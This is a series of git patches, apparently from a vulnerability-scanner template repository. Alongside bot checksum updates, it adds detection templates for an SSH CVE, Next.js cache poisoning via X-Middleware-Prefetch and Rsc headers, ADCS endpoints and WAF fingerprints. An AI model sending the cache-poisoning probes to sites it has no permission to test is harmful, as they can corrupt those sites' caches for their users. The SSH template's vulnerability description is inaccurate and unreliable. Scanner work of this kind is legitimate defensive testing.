-cves.json-checksum.txt:2b097a929a6988afe94e161e7709cefc72d35eee +cves.json:577bdfb13c7dccf9a8cc64cf5fe52348cfee4992 +cves.json-checksum.txt:8ccf0562968be69b50a398c4e12384370a601513 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -5247,7 +5247,7 @@ http/exposures/tokens/heroku/heroku-api-key.yaml:42bc39394c6b55ba8fdc928397651c2 http/exposures/tokens/huggingface/huggingface-user-access-token.yaml:e8544daaa285ad6d2a73826c0def114d1ea4d563 http/exposures/tokens/jenkins/jenkins-crumb-token.yaml:1a5a3ba9c123df0bef7587520f5ebf336cee34d9 http/exposures/tokens/jotform/jotform-api-key.yaml:cffbadf1bbffc6d45ad799489a3559697635e3ba -http/exposures/tokens/jwk-json-leak.yaml:3f780555508cbc85fe7959f184b896e2f4fabce7 +http/exposures/tokens/jwk-json-leak.yaml:0399c85dc7cd354f3d9f842b52c148e4861044d4 http/exposures/tokens/linkedin/linkedin-client-id.yaml:daadd8cf4d5c8cd943c9573f53f12673378a0bd2 http/exposures/tokens/linkedin/linkedin-secret-key.yaml:835b75d730dec88cabcdd378db670cc4d864831d http/exposures/tokens/loqate/loqate-api-key.yaml:eb343ed12ce2b0c065095b4b813ea40835019de4 @@ -8861,7 +8861,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c0e2bb88771fbc15e1da08f2bb9f05688e3959f6 +templates-checksum.txt:3518e59163558ed890682ad31e61162750b627ce wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3dc7577b7097179d2f6771f890146abeede40fcd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 06:57:01 +0000 Subject: [PATCH 1055/1841] Auto Template Signing [Wed Jul 10 06:57:01 UTC 2024] :robot: --- http/exposures/tokens/jwk-json-leak.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/tokens/jwk-json-leak.yaml b/http/exposures/tokens/jwk-json-leak.yaml index a5603dfd57..bb556e028b 100644 --- a/http/exposures/tokens/jwk-json-leak.yaml +++ b/http/exposures/tokens/jwk-json-leak.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b718974b135dcbaf5491507c379544edddca58967a6ef8f72eeea45fe2059cb102207edaf758be880a6f6ed1a1cf5e9ac4750f27230c4eac03dd9f0938c88224f416:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205581eae6281f5e413965da3fe0031dbb6908676617f08fd0b19396c86046281702210081886f398e6973d5894cf43b439d3825e0e036150c7a2355bab22714bf4c960d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a39946ee11e485f40209ae4426226a02101e162a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 07:12:41 +0000 Subject: [PATCH 1056/1841] Auto Generated New Template Addition List [Wed Jul 10 07:12:41 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ea73af70c1..ce184ac685 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ dast/cves/2022/spring4shell-CVE-2022-22965.yaml dast/vulnerabilities/injection/csv-injection.yaml dast/vulnerabilities/injection/xinclude-injection.yaml +http/cnvd/2023/CNVD-2023-03903.yaml http/cnvd/2024/CNVD-2021-64035.yaml http/cves/2020/CVE-2020-10189.yaml http/cves/2023/CVE-2023-3380.yaml From 3563a0eafad809e57c312706a61b2df96477dbe7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 07:12:51 +0000 Subject: [PATCH 1057/1841] Auto Generated Templates Checksum [Wed Jul 10 07:12:51 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1d059a21c4..0a7fdb22a2 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -988,6 +988,7 @@ http/cnvd/2022/CNVD-2022-03672.yaml:f4d4974170f405875cfc0cd6f61574e1a39b2772 http/cnvd/2022/CNVD-2022-42853.yaml:3a6672aeea87cae4f92e10b0c2502fb5f367967d http/cnvd/2022/CNVD-2022-43245.yaml:5517d85329dd0ed3f1e7ad377a975304030ce66b http/cnvd/2022/CNVD-2022-86535.yaml:00d1bf41def187f5b792344c1393ae436a839513 +http/cnvd/2023/CNVD-2023-03903.yaml:a049a9b56f670d5839d753d173f86969ed904319 http/cnvd/2023/CNVD-2023-08743.yaml:8c2c0d1a7f369a2570b604f2aa5820f2de976388 http/cnvd/2023/CNVD-2023-12632.yaml:20d2c023ba88ea69568ea70c9619a6f229c9a929 http/cnvd/2023/CNVD-2023-96945.yaml:af381634d92b6ad37814da12d2f652c60614fe75 @@ -5247,7 +5248,7 @@ http/exposures/tokens/heroku/heroku-api-key.yaml:42bc39394c6b55ba8fdc928397651c2 http/exposures/tokens/huggingface/huggingface-user-access-token.yaml:e8544daaa285ad6d2a73826c0def114d1ea4d563 http/exposures/tokens/jenkins/jenkins-crumb-token.yaml:1a5a3ba9c123df0bef7587520f5ebf336cee34d9 http/exposures/tokens/jotform/jotform-api-key.yaml:cffbadf1bbffc6d45ad799489a3559697635e3ba -http/exposures/tokens/jwk-json-leak.yaml:0399c85dc7cd354f3d9f842b52c148e4861044d4 +http/exposures/tokens/jwk-json-leak.yaml:d1b29efdc8449742e23b2e9bde4723a4f5aaf774 http/exposures/tokens/linkedin/linkedin-client-id.yaml:daadd8cf4d5c8cd943c9573f53f12673378a0bd2 http/exposures/tokens/linkedin/linkedin-secret-key.yaml:835b75d730dec88cabcdd378db670cc4d864831d http/exposures/tokens/loqate/loqate-api-key.yaml:eb343ed12ce2b0c065095b4b813ea40835019de4 @@ -8861,7 +8862,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3518e59163558ed890682ad31e61162750b627ce +templates-checksum.txt:868ddd547c9b51793f496375e0b99ec6143940ef wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 345e2ad93fc0e49f4267d2c8f5e5422a6ee17ef8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 07:13:39 +0000 Subject: [PATCH 1058/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ad65f89578..d32e812d05 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'dast/cves/2022/spring4shell-CVE-2022-22965.yaml' - 'dast/vulnerabilities/injection/csv-injection.yaml' - 'dast/vulnerabilities/injection/xinclude-injection.yaml' + - 'http/cnvd/2023/CNVD-2023-03903.yaml' - 'http/cnvd/2024/CNVD-2021-64035.yaml' - 'http/cves/2020/CVE-2020-10189.yaml' - 'http/cves/2023/CVE-2023-3380.yaml' From 5ee040606ce37fad391492f9e5e062993af780c2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 07:14:33 +0000 Subject: [PATCH 1059/1841] Auto Template Signing [Wed Jul 10 07:14:33 UTC 2024] :robot: --- http/cnvd/2023/CNVD-2023-03903.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cnvd/2023/CNVD-2023-03903.yaml b/http/cnvd/2023/CNVD-2023-03903.yaml index 53acee962e..155cee360f 100644 --- a/http/cnvd/2023/CNVD-2023-03903.yaml +++ b/http/cnvd/2023/CNVD-2023-03903.yaml @@ -38,3 +38,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100bf4d98a1d5071ee2125069f252cb7c9b5c82786c2c6417efcdcc76d4d11974a9022100fb6150249e310852df3949616184494dfc7f5862534302a1a36b7416621527fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3cda62a31f9c2bf59a90fac617a9afe48d49799e Mon Sep 17 00:00:00 2001 From: Sumanth Vankineni Date: Wed, 10 Jul 2024 02:36:19 -0700 Subject: [PATCH 1060/1841] Fixed issues for CVE-2023-33246 --- network/cves/2024/CVE-2024-6387.yaml | 38 ++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 network/cves/2024/CVE-2024-6387.yaml diff --git a/network/cves/2024/CVE-2024-6387.yaml b/network/cves/2024/CVE-2024-6387.yaml new file mode 100644 index 0000000000..0cbf0d8738 --- /dev/null +++ b/network/cves/2024/CVE-2024-6387.yaml @@ -0,0 +1,38 @@ +id: CVE-2024-6387 + +info: + name: regreSSHion - Vulnerable SSH Authentication + author: Sumanth Vankineni + severity: high + description: | + The CVE-2024-6387 describes a vulnerability in the SSH service where malformed authentication requests can lead to unauthorized access. + remediation: Update to the latest version of SSH to mitigate this vulnerability. + reference: + - https://example.com/cve-2024-6387 + - https://nvd.nist.gov/vuln/detail/CVE-2024-6387 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-6387 + cwe-id: CWE-287 + epss-score: 0.05 + epss-percentile: 0.95 + cpe: cpe:2.3:a:ssh:ssh:8.5:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: ssh + product: ssh + tags: network,cve2024,cve,ssh,openssh,tcp + +tcp: + - host: + - "{{Hostname}}" + port: 22 + inputs: + - data: "SSH-2.0-ExampleClientStaticTest" + matchers: + - type: regex + regex: + - "SSH-2\\.0-OpenSSH_8\\.[5-9]" + - "SSH-2\\.0-OpenSSH_9\\.[0-7]" + part: data From 3f649e35aa644fd37d61b35616b41b21fd3d910b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 09:43:35 +0000 Subject: [PATCH 1061/1841] Auto Generated New Template Addition List [Wed Jul 10 09:43:35 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ce184ac685..456cce918e 100644 --- a/.new-additions +++ b/.new-additions @@ -31,6 +31,7 @@ http/cves/2024/CVE-2024-5084.yaml http/cves/2024/CVE-2024-5522.yaml http/cves/2024/CVE-2024-5947.yaml http/cves/2024/CVE-2024-6028.yaml +http/cves/2024/CVE-2024-6188.yaml http/default-logins/apache/apache-apollo-default-login.yaml http/default-logins/caprover/caprover-default-login.yaml http/default-logins/dialogic/dialogic-xms-default-login.yaml From 6a859b3cd8982c78cda345f23fd93f5b66833c08 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 09:43:41 +0000 Subject: [PATCH 1062/1841] Auto Generated Templates Checksum [Wed Jul 10 09:43:41 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0a7fdb22a2..49ea616153 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -988,7 +988,7 @@ http/cnvd/2022/CNVD-2022-03672.yaml:f4d4974170f405875cfc0cd6f61574e1a39b2772 http/cnvd/2022/CNVD-2022-42853.yaml:3a6672aeea87cae4f92e10b0c2502fb5f367967d http/cnvd/2022/CNVD-2022-43245.yaml:5517d85329dd0ed3f1e7ad377a975304030ce66b http/cnvd/2022/CNVD-2022-86535.yaml:00d1bf41def187f5b792344c1393ae436a839513 -http/cnvd/2023/CNVD-2023-03903.yaml:a049a9b56f670d5839d753d173f86969ed904319 +http/cnvd/2023/CNVD-2023-03903.yaml:45257042fc1f34bbce82e67a75121333bad5d6c1 http/cnvd/2023/CNVD-2023-08743.yaml:8c2c0d1a7f369a2570b604f2aa5820f2de976388 http/cnvd/2023/CNVD-2023-12632.yaml:20d2c023ba88ea69568ea70c9619a6f229c9a929 http/cnvd/2023/CNVD-2023-96945.yaml:af381634d92b6ad37814da12d2f652c60614fe75 @@ -3493,6 +3493,7 @@ http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 +http/cves/2024/CVE-2024-6188.yaml:e510a62d65d344e2a3074e98a40fe3e65cebb755 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -8862,7 +8863,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:868ddd547c9b51793f496375e0b99ec6143940ef +templates-checksum.txt:ff54a2d13cedc0bba397c40e2a10d4f86804b97a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a95b3ceb63ea8d93ecf47b0210ce9dd1e0c4328c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 09:43:43 +0000 Subject: [PATCH 1063/1841] Auto Generated cves.json [Wed Jul 10 09:43:43 UTC 2024] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 84eaa5bd15..fc27b33e55 100644 --- a/cves.json +++ b/cves.json @@ -2481,6 +2481,7 @@ {"ID":"CVE-2024-5522","Info":{"Name":"WordPress HTML5 Video Player \u003c 2.5.27 - SQL Injection","Severity":"critical","Description":"The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5522.yaml"} {"ID":"CVE-2024-5947","Info":{"Name":"Deep Sea Electronics DSE855 - Authentication Bypass","Severity":"medium","Description":"Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5947.yaml"} {"ID":"CVE-2024-6028","Info":{"Name":"Quiz Maker \u003c= 6.5.8.3 - SQL Injection","Severity":"critical","Description":"The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6028.yaml"} +{"ID":"CVE-2024-6188","Info":{"Name":"TrakSYS 11.x.x - Sensitive Data Exposure","Severity":"medium","Description":"A vulnerability was found in Parsec Automation TrackSYS 11.x.x and classified as problematic. This issue affects some unknown processing of the file /TS/export/pagedefinition. The manipulation of the argument ID leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6188.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 2dc5113fa0..c57eb97482 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -0b3219f149946276f5354bd51c7072b4 +d1f295df512d3eeba2ed9182053c6288 From 6c39a4aaaeca15de13c61ca4a2c201db7d363020 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 09:44:23 +0000 Subject: [PATCH 1064/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d32e812d05..33f9db2a50 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -36,6 +36,7 @@ on: - 'http/cves/2024/CVE-2024-5522.yaml' - 'http/cves/2024/CVE-2024-5947.yaml' - 'http/cves/2024/CVE-2024-6028.yaml' + - 'http/cves/2024/CVE-2024-6188.yaml' - 'http/default-logins/apache/apache-apollo-default-login.yaml' - 'http/default-logins/caprover/caprover-default-login.yaml' - 'http/default-logins/dialogic/dialogic-xms-default-login.yaml' From e11528b54233b553896ea10df360b89b7423778f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 09:45:28 +0000 Subject: [PATCH 1065/1841] Auto Template Signing [Wed Jul 10 09:45:28 UTC 2024] :robot: --- http/cves/2024/CVE-2024-6188.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-6188.yaml b/http/cves/2024/CVE-2024-6188.yaml index c3bdcf622e..08c928cd2c 100644 --- a/http/cves/2024/CVE-2024-6188.yaml +++ b/http/cves/2024/CVE-2024-6188.yaml @@ -43,3 +43,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100b253a5a98a7432b44402719cf5070ea48a46f736dd935a3d191850571d8ee09502204dbe17d2cfedb94c6e00365e24ceab71bea2bc0076eaafda23b18aabc7585dab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 69ea991d595808ad62e7884c78c2370520727a60 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 15:53:43 +0530 Subject: [PATCH 1066/1841] Next.js Cache Poisoning using X-Middleware-Prefetch --- .../nextjs/nextjs-middleware-cache.yaml | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml diff --git a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml new file mode 100644 index 0000000000..d1fb00608e --- /dev/null +++ b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml @@ -0,0 +1,52 @@ +id: nextjs-middleware-cache + +info: + name: Next.js Cache Poisoning using X-Middleware-Prefetch + author: DhiyaneshDk + severity: high + reference: + - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole + metadata: + verified: true + vendor: vercel + product: next.js + framework: node.js + shodan-query: + - http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" + fofa-query: body="/_next/static" + tags: nextjs,cache + +variables: + rand: "{{rand_text_numeric(5)}}" + +http: + - raw: + - | + GET /?cb={{rand}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + X-Middleware-Prefetch: 1 + Priority: u=1 + + - | + @timeout: 5s + GET /?cb={{rand}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + X-Middleware-Prefetch: 1 + Priority: u=1 + + - | + @timeout: 5s + GET /?cb={{rand}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "status_code_2 == 200 && contains(all_headers_2, 'X-Middleware-Skip: 1')" + - "status_code_3 == 200 && contains(all_headers_3, 'X-Middleware-Skip: 1')" + condition: and From 853fc36122193829e2fe70e977cb100f772c8e83 Mon Sep 17 00:00:00 2001 From: Pastaga Date: Wed, 10 Jul 2024 12:23:47 +0200 Subject: [PATCH 1067/1841] Create adcs-detect.yaml --- adcs-detect.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 adcs-detect.yaml diff --git a/adcs-detect.yaml b/adcs-detect.yaml new file mode 100644 index 0000000000..4705dc4f92 --- /dev/null +++ b/adcs-detect.yaml @@ -0,0 +1,28 @@ +id: adcs-detect + +info: + name: ADCS Detection + author: pastaga,defte + severity: info + description: ADCS Detection checks for common redirection on potential ADCS endpoints. It should be used with the list of all domain servers like `cat servers_ips.txt | nuclei -id adcs-detect` + tags: ad,adcs + +http: + - method: GET + path: + - "{{BaseURL}}/certenroll" + + redirects: true + matchers-condition: and + matchers: + - type: status + status: + - 300 + - 301 + - 302 + condition: or + + - type: word + words: + - "Location: {{BaseURL}}/certenroll/" + part: header From 63b4038a9161fb9166547f00d60b4081058107c6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 15:55:48 +0530 Subject: [PATCH 1068/1841] Create nextjs-rsc-cache.yaml --- .../nextjs/nextjs-rsc-cache.yaml | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml diff --git a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml new file mode 100644 index 0000000000..9c454114c9 --- /dev/null +++ b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml @@ -0,0 +1,52 @@ +id: nextjs-rsc-cache + +info: + name: Next.js Cache Poisoning using RSC + author: DhiyaneshDk + severity: high + reference: + - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole + metadata: + verified: true + vendor: vercel + product: next.js + framework: node.js + shodan-query: + - http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" + fofa-query: body="/_next/static" + tags: next-js,cache + +variables: + rand: "{{rand_text_numeric(5)}}" + +http: + - raw: + - | + GET /?cb={{rand}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Priority: u=1 + Rsc: 1 + + - | + @timeout: 5s + GET /?cb={{rand}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Priority: u=1 + Rsc: 1 + + - | + @timeout: 5s + GET /?cb={{rand}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "status_code_2 == 200 && contains(content_type_2, 'text/x-component')" + - "status_code_3 == 200 && contains(content_type_3, 'text/x-component')" + condition: and From f6b215570ead2baaaf72d36190ffc134ccdc032e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 15:57:30 +0530 Subject: [PATCH 1069/1841] fix trail space --- http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml index d1fb00608e..78b95503f8 100644 --- a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml @@ -29,7 +29,7 @@ http: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Middleware-Prefetch: 1 Priority: u=1 - + - | @timeout: 5s GET /?cb={{rand}} HTTP/1.1 From 090c620238c5eeb8eb35cb5c1e4723a158081132 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 16:00:05 +0530 Subject: [PATCH 1070/1841] minor update --- http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml index 9c454114c9..9597d2d30f 100644 --- a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml @@ -29,7 +29,7 @@ http: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Priority: u=1 Rsc: 1 - + - | @timeout: 5s GET /?cb={{rand}} HTTP/1.1 From e8f3e6c762836918bcf371912d8ab4ef7da5338a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 10 Jul 2024 16:48:49 +0530 Subject: [PATCH 1071/1841] Update waf-detect.yaml --- http/technologies/waf-detect.yaml | 57 ++++++++++++++++++++++++++++++- 1 file changed, 56 insertions(+), 1 deletion(-) diff --git a/http/technologies/waf-detect.yaml b/http/technologies/waf-detect.yaml index eecfd778b8..9a884f0dee 100644 --- a/http/technologies/waf-detect.yaml +++ b/http/technologies/waf-detect.yaml @@ -746,4 +746,59 @@ http: - '(?)content="CloudWAF"' - 'Server: CloudWAF' - 'Set-Cookie: HWWAFSESID=' -# digest: 490a0046304402205229eadf2567f1e73205f840656054fe2f167c6087611d957f79eeea3d1b2cd0022066ec38f2a9f60e5d2c1fc095899aade2bf1af5722bddd41d5e414b5c83979f68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + - type: word + name: safe3webfirewall + part: header + words: + - "safe3 Web Firewall" + + - type: word + name: safedog + part: header + words: + - "X-Safe-Firewall" + - "safedog-flow" + condition: or + + - type: word + name: squarespace + part: header + words: + - "Squarespace" + - "Firewall_action" + condition: and + + - type: word + name: yunsuo + part: body + words: + - "yunsuologo" + + - type: word + name: godaddywebprotection + part: body + words: + - "GoDaddy Security" + - "seal.godaddy.com" + - "GoDaddy security" + condition: or + + - type: word + name: transipwebfirewall + part: header + words: + - "X-TransIP-Balancer" + + - type: word + name: xlabssecuritywaf + part: header + words: + - "Secured: By XLabs Security" + + - type: word + name: shieldonfirewall + part: header + words: + - "X-Protected-By: shieldon.io" + From bc4f0aaf8ddc0d8e16d9f53c920174dcfbc9b1bd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 16:51:48 +0530 Subject: [PATCH 1072/1841] fix error --- 